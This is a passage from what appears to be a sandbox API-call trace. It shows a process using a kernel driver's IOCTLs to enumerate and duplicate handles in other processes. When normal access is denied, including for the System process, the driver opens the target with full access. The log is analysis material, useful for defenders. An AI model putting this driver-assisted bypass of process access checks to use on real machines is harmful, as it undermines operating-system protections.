lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0288.550] PsLookupProcessByProcessId (in: ProcessId=0x7c8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.550] PsAcquireProcessExitSynchronization () returned 0x0 [0288.550] KeStackAttachProcess (in: PROCESS=0xffffe00069e0d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e0d840, ApcState=0xffffd000ac0cf400) [0288.550] ObReferenceObjectByHandle (in: Handle=0x5f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a010ad0, HandleInformation=0x0) returned 0x0 [0288.550] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.550] PsReleaseProcessExitSynchronization () returned 0x2 [0288.550] ObfDereferenceObject (Object=0xffffe00069e0d840) returned 0x38044 [0288.550] ObQueryNameString (in: Object=0xffffe0006a010ad0, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.550] ObfDereferenceObject (Object=0xffffe0006a010ad0) returned 0x17fb0 [0288.550] IoCompleteRequest () returned 0x0 [0288.550] CloseHandle (hObject=0x188) returned 1 [0288.550] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x44c) returned 0x188 [0288.550] GetCurrentProcess () returned 0xffffffffffffffff [0288.550] DuplicateHandle (in: hSourceProcessHandle=0x188, hSourceHandle=0x464, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x0) returned 0 [0288.550] CloseHandle (hObject=0x188) returned 1 [0288.550] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335004c, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x266f70, nOutBufferSize=0x88, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x266f70*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0288.550] PsLookupProcessByProcessId (in: ProcessId=0x44c, Process=0xffffd000ac0cf3d8 | out: Process=0xffffd000ac0cf3d8) returned 0x0 [0288.550] PsAcquireProcessExitSynchronization () returned 0x0 [0288.550] KeStackAttachProcess (in: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf3f8 | out: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf3f8) [0288.550] ObReferenceObjectByHandle (in: Handle=0x464, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf3e0, HandleInformation=0x0 | out: Object=0xffffd000ac0cf3e0*=0xffffe00069a40a10, HandleInformation=0x0) returned 0x0 [0288.550] PsReleaseProcessExitSynchronization () returned 0x2 [0288.550] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x40004 [0288.550] ZwQueryObject (in: Handle=0x464, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0xffffd000ac0cf3d4 | out: ObjectInformation=0x0, ReturnLength=0xffffd000ac0cf3d4) returned 0xc0000004 [0288.550] ExAllocatePoolWithTag (PoolType=0x1, NumberOfBytes=0x80, Tag=0x58637250) returned 0xffffc0014dba5230 [0288.550] ZwQueryObject (in: Handle=0x464, ObjectInformationClass=0x2, ObjectInformation=0xffffc0014dba5230, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0xffffc0014dba5230, ReturnLength=0x0) returned 0x0 [0288.550] ExFreePoolWithTag (P=0xffffc0014dba5230, Tag=0x0) [0288.551] ObfDereferenceObject (Object=0xffffe00069a40a10) returned 0x7ffb [0288.551] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf3f8) [0288.551] IoCompleteRequest () returned 0x0 [0288.551] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0288.551] PsLookupProcessByProcessId (in: ProcessId=0x44c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.551] PsAcquireProcessExitSynchronization () returned 0x0 [0288.551] KeStackAttachProcess (in: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400) [0288.551] ObReferenceObjectByHandle (in: Handle=0x464, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a40a10, HandleInformation=0x0) returned 0x0 [0288.551] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.551] PsReleaseProcessExitSynchronization () returned 0x2 [0288.551] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x40003 [0288.551] ObQueryNameString (in: Object=0xffffe00069a40a10, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.551] ObfDereferenceObject (Object=0xffffe00069a40a10) returned 0x7ffa [0288.551] IoCompleteRequest () returned 0x0 [0288.551] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x44c) returned 0x188 [0288.551] GetCurrentProcess () returned 0xffffffffffffffff [0288.551] DuplicateHandle (in: hSourceProcessHandle=0x188, hSourceHandle=0x1d0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x0) returned 0 [0288.551] CloseHandle (hObject=0x188) returned 1 [0288.551] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335004c, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x266f70, nOutBufferSize=0x88, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x266f70*, lpBytesReturned=0x14d450*=0x1c, lpOverlapped=0x0) returned 1 [0288.551] PsLookupProcessByProcessId (in: ProcessId=0x44c, Process=0xffffd000ac0cf3d8 | out: Process=0xffffd000ac0cf3d8) returned 0x0 [0288.551] PsAcquireProcessExitSynchronization () returned 0x0 [0288.551] KeStackAttachProcess (in: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf3f8 | out: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf3f8) [0288.551] ObReferenceObjectByHandle (in: Handle=0x1d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf3e0, HandleInformation=0x0 | out: Object=0xffffd000ac0cf3e0*=0xffffc001488ac870, HandleInformation=0x0) returned 0x0 [0288.551] PsReleaseProcessExitSynchronization () returned 0x2 [0288.551] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x40001 [0288.551] ZwQueryObject (in: Handle=0x1d0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0xffffd000ac0cf3d4 | out: ObjectInformation=0x0, ReturnLength=0xffffd000ac0cf3d4) returned 0xc0000004 [0288.551] ExAllocatePoolWithTag (PoolType=0x1, NumberOfBytes=0x80, Tag=0x58637250) returned 0xffffc0014dba5230 [0288.551] ZwQueryObject (in: Handle=0x1d0, ObjectInformationClass=0x2, ObjectInformation=0xffffc0014dba5230, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0xffffc0014dba5230, ReturnLength=0x0) returned 0x0 [0288.551] ExFreePoolWithTag (P=0xffffc0014dba5230, Tag=0x0) [0288.551] ObfDereferenceObject (Object=0xffffc001488ac870) returned 0x7ffb [0288.551] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf3f8) [0288.551] IoCompleteRequest () returned 0x0 [0288.551] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0288.551] PsLookupProcessByProcessId (in: ProcessId=0x44c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.551] PsAcquireProcessExitSynchronization () returned 0x0 [0288.551] KeStackAttachProcess (in: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069990840, ApcState=0xffffd000ac0cf400) [0288.551] ObReferenceObjectByHandle (in: Handle=0x1d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffc001488ac870, HandleInformation=0x0) returned 0x0 [0288.551] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.551] PsReleaseProcessExitSynchronization () returned 0x2 [0288.551] ObfDereferenceObject (Object=0xffffe00069990840) returned 0x40000 [0288.551] ObQueryNameString (in: Object=0xffffc001488ac870, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.551] ObfDereferenceObject (Object=0xffffc001488ac870) returned 0x7ffa [0288.552] IoCompleteRequest () returned 0x0 [0288.552] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x140) returned 0x188 [0288.552] GetCurrentProcess () returned 0xffffffffffffffff [0288.552] DuplicateHandle (in: hSourceProcessHandle=0x188, hSourceHandle=0x68, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x0) returned 0 [0288.552] CloseHandle (hObject=0x188) returned 1 [0288.552] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335004c, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x266f70, nOutBufferSize=0x88, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x266f70*, lpBytesReturned=0x14d450*=0x22, lpOverlapped=0x0) returned 1 [0288.552] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf3d8 | out: Process=0xffffd000ac0cf3d8) returned 0x0 [0288.552] PsAcquireProcessExitSynchronization () returned 0x0 [0288.552] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf3f8 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf3f8) [0288.552] ObReferenceObjectByHandle (in: Handle=0x68, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf3e0, HandleInformation=0x0 | out: Object=0xffffd000ac0cf3e0*=0xffffe0006a27be20, HandleInformation=0x0) returned 0x0 [0288.552] PsReleaseProcessExitSynchronization () returned 0x2 [0288.552] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x4000e [0288.552] ZwQueryObject (in: Handle=0x68, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0xffffd000ac0cf3d4 | out: ObjectInformation=0x0, ReturnLength=0xffffd000ac0cf3d4) returned 0xc0000004 [0288.552] ExAllocatePoolWithTag (PoolType=0x1, NumberOfBytes=0x88, Tag=0x58637250) returned 0xffffc0014dccd960 [0288.552] ZwQueryObject (in: Handle=0x68, ObjectInformationClass=0x2, ObjectInformation=0xffffc0014dccd960, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0xffffc0014dccd960, ReturnLength=0x0) returned 0x0 [0288.552] ExFreePoolWithTag (P=0xffffc0014dccd960, Tag=0x0) [0288.552] ObfDereferenceObject (Object=0xffffe0006a27be20) returned 0x7ffa [0288.552] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf3f8) [0288.552] IoCompleteRequest () returned 0x0 [0288.552] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0288.552] PsLookupProcessByProcessId (in: ProcessId=0x140, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.552] PsAcquireProcessExitSynchronization () returned 0x0 [0288.552] KeStackAttachProcess (in: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006993e080, ApcState=0xffffd000ac0cf400) [0288.552] ObReferenceObjectByHandle (in: Handle=0x68, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a27be20, HandleInformation=0x0) returned 0x0 [0288.552] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.552] PsReleaseProcessExitSynchronization () returned 0x2 [0288.552] ObfDereferenceObject (Object=0xffffe0006993e080) returned 0x4000d [0288.552] ObQueryNameString (in: Object=0xffffe0006a27be20, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.552] ObfDereferenceObject (Object=0xffffe0006a27be20) returned 0x7ff9 [0288.552] IoCompleteRequest () returned 0x0 [0288.552] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x2d8) returned 0x188 [0288.552] GetCurrentProcess () returned 0xffffffffffffffff [0288.552] DuplicateHandle (in: hSourceProcessHandle=0x188, hSourceHandle=0x38c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x18c) returned 1 [0288.552] CloseHandle (hObject=0x188) returned 1 [0288.552] NtQueryObject (in: Handle=0x18c, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.552] NtQueryObject (in: Handle=0x18c, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.552] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0288.553] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.553] PsAcquireProcessExitSynchronization () returned 0x0 [0288.553] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000ac0cf400) [0288.553] ObReferenceObjectByHandle (in: Handle=0x38c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00067e9c650, HandleInformation=0x0) returned 0x0 [0288.553] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.553] PsReleaseProcessExitSynchronization () returned 0x2 [0288.553] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380a6 [0288.553] ObQueryNameString (in: Object=0xffffe00067e9c650, ObjectNameInfo=0xffffe0006a65b044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a65b044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.553] ObfDereferenceObject (Object=0xffffe00067e9c650) returned 0xfffa [0288.553] IoCompleteRequest () returned 0x0 [0288.553] CloseHandle (hObject=0x18c) returned 1 [0288.553] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x240) returned 0x18c [0288.553] GetCurrentProcess () returned 0xffffffffffffffff [0288.553] DuplicateHandle (in: hSourceProcessHandle=0x18c, hSourceHandle=0x478, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x188) returned 1 [0288.553] CloseHandle (hObject=0x18c) returned 1 [0288.553] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.553] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.553] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x38, lpOverlapped=0x0) returned 1 [0288.553] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.553] PsAcquireProcessExitSynchronization () returned 0x0 [0288.553] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0288.553] ObReferenceObjectByHandle (in: Handle=0x478, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000693de2d0, HandleInformation=0x0) returned 0x0 [0288.553] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.553] PsReleaseProcessExitSynchronization () returned 0x2 [0288.553] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78175 [0288.553] ObQueryNameString (in: Object=0xffffe000693de2d0, ObjectNameInfo=0xffffe0006a6fa7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6fa7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.553] ObfDereferenceObject (Object=0xffffe000693de2d0) returned 0x17fff [0288.553] IoCompleteRequest () returned 0x0 [0288.553] CloseHandle (hObject=0x188) returned 1 [0288.553] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x19c) returned 0x0 [0288.553] GetLastError () returned 0x5 [0288.553] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335003c, lpInBuffer=0x14d400*, nInBufferSize=0x8, lpOutBuffer=0x14d408, nOutBufferSize=0x8, lpBytesReturned=0x14d390, lpOverlapped=0x0 | out: lpInBuffer=0x14d400*, lpOutBuffer=0x14d408*, lpBytesReturned=0x14d390*=0x8, lpOverlapped=0x0) returned 1 [0288.553] ZwOpenProcess (in: ProcessHandle=0xffffe00069994900, DesiredAccess=0x10000000, ObjectAttributes=0xffffd000ac0cf4b8*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xffffd000ac0cf4a8*(UniqueProcess=0x19c, UniqueThread=0x0) | out: ProcessHandle=0xffffe00069994900*=0x188) returned 0x0 [0288.553] IoCompleteRequest () returned 0x0 [0288.553] GetCurrentProcess () returned 0xffffffffffffffff [0288.553] DuplicateHandle (in: hSourceProcessHandle=0x188, hSourceHandle=0x8c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x18c) returned 1 [0288.553] CloseHandle (hObject=0x188) returned 1 [0288.553] NtQueryObject (in: Handle=0x18c, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.554] NtQueryObject (in: Handle=0x18c, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.554] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x52, lpOverlapped=0x0) returned 1 [0288.554] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.554] PsAcquireProcessExitSynchronization () returned 0x0 [0288.554] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000ac0cf400) [0288.554] ObReferenceObjectByHandle (in: Handle=0x8c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffc00147915c60, HandleInformation=0x0) returned 0x0 [0288.554] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.554] PsReleaseProcessExitSynchronization () returned 0x2 [0288.554] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x28079 [0288.554] ObQueryNameString (in: Object=0xffffc00147915c60, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.554] ObfDereferenceObject (Object=0xffffc00147915c60) returned 0xffff [0288.554] IoCompleteRequest () returned 0x0 [0288.554] CloseHandle (hObject=0x18c) returned 1 [0288.554] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0288.554] GetLastError () returned 0x5 [0288.554] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335003c, lpInBuffer=0x14d400*, nInBufferSize=0x8, lpOutBuffer=0x14d408, nOutBufferSize=0x8, lpBytesReturned=0x14d390, lpOverlapped=0x0 | out: lpInBuffer=0x14d400*, lpOutBuffer=0x14d408*, lpBytesReturned=0x14d390*=0x8, lpOverlapped=0x0) returned 1 [0288.554] ZwOpenProcess (in: ProcessHandle=0xffffe00069994900, DesiredAccess=0x10000000, ObjectAttributes=0xffffd000ac0cf4b8*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xffffd000ac0cf4a8*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xffffe00069994900*=0x18c) returned 0x0 [0288.554] IoCompleteRequest () returned 0x0 [0288.554] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350014, lpInBuffer=0x14d430*, nInBufferSize=0x20, lpOutBuffer=0x14d470, nOutBufferSize=0x8, lpBytesReturned=0x14d3d0, lpOverlapped=0x0 | out: lpInBuffer=0x14d430*, lpOutBuffer=0x14d470*, lpBytesReturned=0x14d3d0*=0x8, lpOverlapped=0x0) returned 1 [0288.554] ZwOpenProcess (in: ProcessHandle=0xffffd000ac0cf420, DesiredAccess=0x40, ObjectAttributes=0xffffd000ac0cf438*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x200, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xffffd000ac0cf428*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xffffd000ac0cf420*=0xffffffff80000d78) returned 0x0 [0288.554] ZwDuplicateObject (in: SourceProcessHandle=0xffffffff80000d78, SourceHandle=0xa5c, TargetProcessHandle=0xffffffffffffffff, TargetHandle=0xffffe00069994900, DesiredAccess=0x10000000, HandleAttributes=0x0, Options=0x0 | out: TargetHandle=0xffffe00069994900*=0x188) returned 0x0 [0288.554] ZwClose (Handle=0xffffffff80000d78) returned 0x0 [0288.554] IoCompleteRequest () returned 0x0 [0288.554] CloseHandle (hObject=0x18c) returned 1 [0288.554] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.554] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.554] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0288.554] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.554] PsAcquireProcessExitSynchronization () returned 0x0 [0288.554] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.554] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000690503d0, HandleInformation=0x0) returned 0x0 [0288.554] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.554] PsReleaseProcessExitSynchronization () returned 0x2 [0288.554] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f900 [0288.554] ObQueryNameString (in: Object=0xffffe000690503d0, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.554] ObfDereferenceObject (Object=0xffffe000690503d0) returned 0xfffe [0288.555] IoCompleteRequest () returned 0x0 [0288.555] CloseHandle (hObject=0x188) returned 1 [0288.555] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0288.555] GetLastError () returned 0x5 [0288.555] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335003c, lpInBuffer=0x14d400*, nInBufferSize=0x8, lpOutBuffer=0x14d408, nOutBufferSize=0x8, lpBytesReturned=0x14d390, lpOverlapped=0x0 | out: lpInBuffer=0x14d400*, lpOutBuffer=0x14d408*, lpBytesReturned=0x14d390*=0x8, lpOverlapped=0x0) returned 1 [0288.555] ZwOpenProcess (in: ProcessHandle=0xffffe00069994900, DesiredAccess=0x10000000, ObjectAttributes=0xffffd000ac0cf4b8*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xffffd000ac0cf4a8*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xffffe00069994900*=0x188) returned 0x0 [0288.555] IoCompleteRequest () returned 0x0 [0288.555] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350014, lpInBuffer=0x14d430*, nInBufferSize=0x20, lpOutBuffer=0x14d470, nOutBufferSize=0x8, lpBytesReturned=0x14d3d0, lpOverlapped=0x0 | out: lpInBuffer=0x14d430*, lpOutBuffer=0x14d470*, lpBytesReturned=0x14d3d0*=0x8, lpOverlapped=0x0) returned 1 [0288.555] ZwOpenProcess (in: ProcessHandle=0xffffd000ac0cf420, DesiredAccess=0x40, ObjectAttributes=0xffffd000ac0cf438*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x200, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), 